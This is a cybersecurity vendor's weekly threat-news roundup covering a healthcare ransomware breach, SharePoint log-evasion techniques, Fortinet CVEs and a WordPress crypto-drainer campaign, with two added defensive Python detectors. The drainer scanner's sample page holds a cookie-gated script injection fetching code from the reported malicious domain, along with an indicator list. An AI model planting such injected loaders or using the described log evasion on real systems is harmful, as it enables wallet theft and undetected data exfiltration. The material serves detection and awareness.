Weekly Cyber News Roundup

April 8th to April 12th 2024

Contents

01. News Bites
  • Group Health Cooperative of South Central Wisconsin Suffers Ransomware Attack
  • SharePoint Logging Evasion Techniques Uncovered
  • Fortinet Vulnerabilities: A Trio of Security Concerns
  • WordPress Sites Targeted by "Crypto Drainers"
02. Conclusion

Quick News Bites

Group Health Cooperative of South Central Wisconsin Suffers Ransomware Attack

The Group Health Cooperative of South Central Wisconsin (GHC-SCW) has been subjected to a significant ransomware attack, affecting 533,809 individuals.

Identified on 25 January 2024, the incident did not involve data encryption but did lead to the unauthorised exfiltration of sensitive data. GHC-SCW has identified the attacker but has not disclosed their identity publicly; however, the BlackSuit ransomware group claimed responsibility on its leak site in March.

Additionally, the threat actor claims to have accessed patients' financial information, employee data, business contracts, and email correspondences. Compromised data could include individuals' names, addresses, telephone numbers, email addresses, dates of birth and/or deaths, social security numbers, member numbers, and Medicare/Medicaid numbers.

Despite these claims, there is currently no evidence of the leaked data being exploited.

The incident highlights the need for robust cyber security measures such as Network Detection and Response (NDR) and Security Information and Event Management (SIEM) systems. These could have potentially detected the data exfiltration, emphasising the necessity for enhanced network visibility and real-time monitoring to avert similar incidents.

SharePoint Logging Evasion Techniques Uncovered

Recent research has exposed two novel techniques that facilitate the bypassing or manipulation of SharePoint audit logs, raising significant concerns given SharePoint's widespread adoption by enterprises globally.

These methods allow unauthorised file downloads without detection, posing a high risk to confidential company information. The first technique exploits the "Open in App" feature, which is only logged as an "Access" event, rendering the download activity less conspicuous. The second method involves spoofing the user-agent string to mimic Microsoft SkyDriveSync calls, thus appearing as a routine "FileSyncDownloadedFull" event.

The flaws were first reported by Varonis Threat Labs in November 2023, but because they were rated as moderate severity, fixes are planned for future updates rather than an immediate patch.

Large numbers of access events should be investigated. Limiting users to only the files they need reduces the possible scope of an attack from any one account. Synchronisation events should be monitored for suspicious activity such as unusual working hours or unexpected access locations.
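The two detections suggested above, bursts of "Access" events per user and full-sync downloads at odd hours or from unexpected networks, can be expressed as simple rules over the audit log. The following is an added example, not code from the original roundup or from Varonis; it runs over a constructed set of audit records whose field names (Operation, UserId, ClientIP, UserAgent, CreationTime, ObjectId) are assumed to follow the shape of Microsoft 365 unified audit log entries, with the operation names FileAccessed and FileSyncDownloadedFull used for the two event types the article mentions. The thresholds, working hours and the 10.0.0.0/8 corporate range are illustrative values.

```python
"""Detection rules over constructed SharePoint audit records.

The record layout below is an assumption about the Microsoft 365 unified
audit log schema; every value is constructed for this example.
"""
import ipaddress
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: alice opens six files in a few minutes via "Open in
# App" (each logged only as FileAccessed); bob does a normal full sync from
# the office; carol runs a full sync at 03:12 from an address outside the
# corporate range. Timestamps are treated as UTC.
SAMPLE_LOG = """\
{"CreationTime": "2024-04-09T09:00:05", "Operation": "FileAccessed", "UserId": "alice@example.com", "ClientIP": "10.1.1.20", "UserAgent": "Mozilla/5.0", "ObjectId": "https://tenant.sharepoint.com/sites/fin/q1.xlsx"}
{"CreationTime": "2024-04-09T09:00:41", "Operation": "FileAccessed", "UserId": "alice@example.com", "ClientIP": "10.1.1.20", "UserAgent": "Mozilla/5.0", "ObjectId": "https://tenant.sharepoint.com/sites/fin/q2.xlsx"}
{"CreationTime": "2024-04-09T09:01:12", "Operation": "FileAccessed", "UserId": "alice@example.com", "ClientIP": "10.1.1.20", "UserAgent": "Mozilla/5.0", "ObjectId": "https://tenant.sharepoint.com/sites/fin/q3.xlsx"}
{"CreationTime": "2024-04-09T09:01:50", "Operation": "FileAccessed", "UserId": "alice@example.com", "ClientIP": "10.1.1.20", "UserAgent": "Mozilla/5.0", "ObjectId": "https://tenant.sharepoint.com/sites/fin/q4.xlsx"}
{"CreationTime": "2024-04-09T09:02:33", "Operation": "FileAccessed", "UserId": "alice@example.com", "ClientIP": "10.1.1.20", "UserAgent": "Mozilla/5.0", "ObjectId": "https://tenant.sharepoint.com/sites/fin/budget.docx"}
{"CreationTime": "2024-04-09T09:03:07", "Operation": "FileAccessed", "UserId": "alice@example.com", "ClientIP": "10.1.1.20", "UserAgent": "Mozilla/5.0", "ObjectId": "https://tenant.sharepoint.com/sites/fin/forecast.pptx"}
{"CreationTime": "2024-04-09T10:15:00", "Operation": "FileAccessed", "UserId": "bob@example.com", "ClientIP": "10.1.2.7", "UserAgent": "Mozilla/5.0", "ObjectId": "https://tenant.sharepoint.com/sites/hr/policy.pdf"}
{"CreationTime": "2024-04-09T10:20:00", "Operation": "FileSyncDownloadedFull", "UserId": "bob@example.com", "ClientIP": "10.1.2.7", "UserAgent": "Microsoft SkyDriveSync", "ObjectId": "https://tenant.sharepoint.com/sites/hr/policy.pdf"}
{"CreationTime": "2024-04-09T03:12:44", "Operation": "FileSyncDownloadedFull", "UserId": "carol@example.com", "ClientIP": "203.0.113.5", "UserAgent": "Microsoft SkyDriveSync", "ObjectId": "https://tenant.sharepoint.com/sites/fin/forecast.pptx"}
"""


def parse_records(text):
    """Parse newline-delimited JSON audit records and attach a datetime."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["_time"] = datetime.fromisoformat(rec["CreationTime"])
        records.append(rec)
    return records


def detect_bulk_access(records, threshold=5, window=timedelta(minutes=5)):
    """Flag users with >= threshold FileAccessed events inside any window."""
    by_user = defaultdict(list)
    for rec in records:
        if rec["Operation"] == "FileAccessed":
            by_user[rec["UserId"]].append(rec["_time"])
    findings = []
    for user, times in by_user.items():
        times.sort()
        for i, start in enumerate(times):
            # Count events from this one forward that fall inside the window.
            count = sum(1 for t in times[i:] if t - start <= window)
            if count >= threshold:
                findings.append({"user": user, "start": start.isoformat(), "count": count})
                break  # one finding per user is enough to raise an alert
    return findings


def detect_suspicious_sync(records, allowed_networks, work_hours=(8, 18)):
    """Flag full-sync downloads outside working hours or expected networks."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    findings = []
    for rec in records:
        if rec["Operation"] != "FileSyncDownloadedFull":
            continue
        reasons = []
        hour = rec["_time"].hour
        if not (work_hours[0] <= hour < work_hours[1]):
            reasons.append("outside working hours")
        ip = ipaddress.ip_address(rec["ClientIP"])
        if not any(ip in net for net in nets):
            reasons.append("source outside expected networks")
        if reasons:
            findings.append({"user": rec["UserId"], "time": rec["CreationTime"],
                             "ip": rec["ClientIP"], "reasons": reasons})
    return findings


def run_detections(text=SAMPLE_LOG, allowed_networks=("10.0.0.0/8",)):
    """Run both rules over a log and return the findings grouped by rule."""
    records = parse_records(text)
    return {
        "bulk_access": detect_bulk_access(records),
        "suspicious_sync": detect_suspicious_sync(records, allowed_networks),
    }


if __name__ == "__main__":
    print(json.dumps(run_detections(), indent=2))
```

Both rules deliberately work on the events that are logged rather than on the download events that are missing: the first technique leaves only FileAccessed entries behind, and the second leaves FileSyncDownloadedFull entries that look routine in isolation, so volume, timing and source network are the signals left to alert on.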

Fortinet Vulnerabilities: A Trio of Security Concerns

Fortinet has recently disclosed three vulnerabilities in its products, presenting varying degrees of risk, including cookie leakage, arbitrary command execution, and sensitive information exposure.

The most severe, CVE-2023-41677, involves a scenario where attackers could capture administrator cookies under specific conditions, particularly when administrators are deceived into visiting malicious websites while using SSL-VPN. This high-severity vulnerability, rated 7.5, affects multiple versions of FortiOS and FortiProxy.

Another issue, CVE-2023-48784, allows arbitrary code execution in FortiOS due to an externally controlled format string in the command line interface. This medium-severity vulnerability requires a local super-admin profile and CLI access to exploit. The third, CVE-2024-23662, enables unauthenticated actors to collect sensitive device information via HTTP requests, and was also rated as medium severity.

The above vulnerabilities range in severity and likelihood of exploitation. However, each could allow an attacker to gain access to a network or gather useful reconnaissance information. Affected products should be patched as soon as possible.

WordPress Sites Targeted by "Crypto Drainers"

The security firm Sucuri has disclosed a widespread campaign targeting WordPress sites, with over 2,000 known compromises designed to siphon cryptocurrency from unsuspecting victims. The attackers embedded fake NFT and discount pop-ups across these sites, coaxing visitors to connect their crypto wallets with promises of receiving discounts or NFTs.

These "Crypto drainers" then proceed to drain the connected wallets of funds and NFTs. The initial attack strategy has evolved, now employing scripts that exploit browser vulnerabilities to brute force other sites' passwords, signifying a shift towards a more extensive and monetised campaign.

The malicious scripts, loaded from dynamic-linx[.]com, activate if the "haw" cookie is absent, injecting harmful code into webpages.
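A site owner can check their own pages for the two indicators the article gives: a script loaded from the reported domain, and an inline loader that only runs when the "haw" cookie is absent. The following scanner is an added example, not code from Sucuri or from the original roundup; it uses only the standard library and runs over a constructed HTML page that contains both a clean third-party script and the two indicators. The domain is written as a plain hostname (the article defangs it with brackets) so that it can be matched against script sources; the sample page, the CDN hostname and the regular expressions are assumptions made for the example.

```python
"""Scan page HTML for the crypto-drainer indicators named in the report.

Constructed example: the sample page and regular expressions are assumptions;
the indicator domain is the one reported in the roundup, undefanged.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator from the report, written as a matchable hostname.
KNOWN_BAD_DOMAINS = {"dynamic-linx.com"}

# Inline loaders in the campaign fire only when the "haw" cookie is absent:
# look for a cookie check that mentions that name within a short distance.
COOKIE_GATE = re.compile(r"document\.cookie[^\n]{0,80}['\"]haw", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Constructed sample page: one legitimate CDN script, one cookie-gated inline
# loader pointing at the bad domain, one external script from the bad domain.
SAMPLE_PAGE = """<!doctype html>
<html><head><title>Shop</title>
<script src="https://cdn.example.net/jquery.min.js"></script>
<script>
if (document.cookie.indexOf("haw=") === -1) {
  var s = document.createElement("script");
  s.src = "https://dynamic-linx.com/p.js";
  document.head.appendChild(s);
}
</script>
</head><body><h1>Welcome</h1>
<script src="https://dynamic-linx.com/drainer.js"></script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def _is_bad(host):
    """True for the indicator domain itself or any subdomain of it."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in KNOWN_BAD_DOMAINS)


def scan_html(html):
    """Return a list of findings for bad script sources and gated loaders."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname or ""
        if _is_bad(host):
            findings.append({"kind": "external_script", "host": host.lower(), "src": src})
    for body in parser.inline:
        bad_hosts = sorted({h.lower() for h in URL_RE.findall(body) if _is_bad(h)})
        gated = bool(COOKIE_GATE.search(body))
        if bad_hosts or gated:
            findings.append({"kind": "inline_script", "hosts": bad_hosts, "cookie_gated": gated})
    return findings


def scan_sample():
    """Convenience wrapper so the example can be run and checked directly."""
    return scan_html(SAMPLE_PAGE)


if __name__ == "__main__":
    for finding in scan_sample():
        print(finding)
```

Running it over every rendered page (or over the theme and plugin files on disk) turns the two indicators into a repeatable check; a hit on the inline rule without the domain is still worth reading by hand, since the cookie gate is the behaviour, and the domain can change between campaigns.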

Users are urged never to connect their wallets to a website that uses advertisements as the main connection method. Nothing is free where cryptocurrency is concerned; discounts offered on websites that never previously accepted cryptocurrency are most likely a scam. It is best to use only trusted platforms, and to check directly with any platform that claims to have recently started accepting crypto payments. If something seems off or uncertain, connect only a wallet holding minimal funds.


Closing Summary

If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively get in touch to find out how you can protect your organisation.

Disclaimer

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.

Need advice?

If you are worried about any of the threats outlined in this roundup or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager or fill in the form for a complimentary no-commitment consultation.

More detailed threat intelligence news?

If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.

We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.


Cyber Security Conference

STOCKHOLM | 17 October 2023

Integrity360's flagship conference Security First comes to Stockholm in 2023!

Join leading cybersecurity experts from across the community as we explore the latest threats and industry trends, and learn practical strategies to safeguard your organisation.